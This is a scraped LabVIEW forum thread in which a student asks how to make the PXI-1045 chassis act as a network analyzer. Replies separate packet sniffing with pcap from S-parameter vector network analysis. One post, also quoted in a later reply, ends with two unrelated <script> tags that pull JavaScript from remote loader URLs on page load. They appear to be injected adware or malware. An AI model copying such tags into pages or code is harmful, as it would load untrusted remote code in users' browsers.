LabVIEW

cancel
Showing results for 
Search instead for 
Did you mean: 

network analyzer

Hello!

I have been asked to make a network analyzer using LABVIEW.

Could anyone please tell me how would I start?

Thanks

0 Kudos
Message 1 of 13
(3,568 Views)

You need to privide a bit more information. What network analyzer? Are you supposed to write a Wireshark clone in LabVIEW?

If a Wireshark type application is indeed the plan, then I would advise you to first start with some simpler application. This is a beast of a thing and the only way to get a TCP stack into promiscious mode under most operating systems is by injecting a filter device driver into the TCP/IP stack. There is fortunately a ready made driver called Pcap (libpcap for non Windows systems and WinPCap for Windows) that can do that and which Wireshark is using too, but interfacing WinPCap is non trivial. You need to use Call Library Nodes to call the device driver API layer and some of the API functions have rather complex parameter lists. There have been numerous attempts in the past in trying to get something working in LabVIEW and if you look for "network pcap" or "network winpcap" in these forums you will find some posts from people having gotten something to work, but AFAIK non of them has reached a state that would really go beyond a proof of concept.

Rolf Kalbermatter
My Blog
0 Kudos
Message 2 of 13
(3,559 Views)

... or are you talking about a network analyzer that determines S-Parameters of electrical circuits, such as S11, S21, etc. A completely different beast.

Anyway you must be more specific.

Cheers

Edgar

0 Kudos
Message 3 of 13
(3,541 Views)

Actually, I am asked to design a Vector Network Analyser using S-parameters of matrix. I don't think it needs to work as a mesurement device. All i need to do is input random data as signals and make my program work as an analyser would. Any suggestions, please. thanks.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
0 Kudos
Message 4 of 13
(3,521 Views)

Looks like you should first make sure you understand what your task is and then learn which way a network analyzer works. A network analyzer doesn't USE S-Parameters, it DETERMINES them.

Cheers

Edgar

0 Kudos
Message 5 of 13
(3,495 Views)

@qkhu wrote:

Actually, I am asked to design a Vector Network Analyser using S-parameters of matrix. I don't think it needs to work as a mesurement device. All i need to do is input random data as signals and make my program work as an analyser would. Any suggestions, please. thanks.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

I'm not sure I understand the issue.  It's all just a bunch of equations, right?  Instead of reading voltage levels of an incoming signal and comparing them to a reference, you can just plug numbers into an equation.  If this is to be used as a stub so you can develop offline, you'd be better served faking the answers rather than trying to duplicate the functionality.

Bill
CLD
(Mid-Level minion.)
My support system ensures that I don't look totally incompetent.
Proud to say that I've progressed beyond knowing just enough to be dangerous. I now know enough to know that I have no clue about anything at all.
Humble author of the CLAD Nugget.
0 Kudos
Message 6 of 13
(3,473 Views)

Actually, the name of the equipment is NI PXi-1045 and I have been asked to come up with a LABVIEW code, so that the equipment behaves as a network analyzer. I hope i am clear now and Thank you for the responses!

0 Kudos
Message 7 of 13
(3,451 Views)

Well the PXI-1045 is simply a chassis. There is no analog input or output in any form in it before you add specific modules. And those modules are the important part.

However considering the very generic way of your inquiry, combined with the minimal information you provide, suggests that you do not yet know what a network analyzer really is. Maybe it would be a good idea to read several articles on the net that detail what a network analyzer can do, and even more importantly how it does it.

LabVIEW is a great tool to implement software defined measurement devices but it can't do all the work for you. You still need to understand the basic principle and the technical implementation details to get such a device working.

Rolf Kalbermatter
My Blog
0 Kudos
Message 8 of 13
(3,442 Views)

well sorry I was not providing enough information.

Ok so here is task which I am given.

We have this equipment in the lab which is known as NI PXI-1045 which is simply a chasis. So I have been asked to write a LABVIEW program so that this equipment acts as  network analyzer. It donest matter if it acts as a simulation tool or an application. It should just act as a network analyzer.

so I need to come up with a LABview code.

Thank you for your time.

0 Kudos
Message 9 of 13
(3,381 Views)

well sorry I was not providing enough information.

Ok so here is task which I am given.

We have this equipment in the lab which is known as NI PXI-1045 which is simply a chasis. So I have been asked to write a LABVIEW program so that this equipment acts as  network analyzer. It donest matter if it acts as a simulation tool or an application. It should just act as a network analyzer.

so I need to come up with a LABview code.

Thank you for your time.

0 Kudos
Message 10 of 13
(3,380 Views)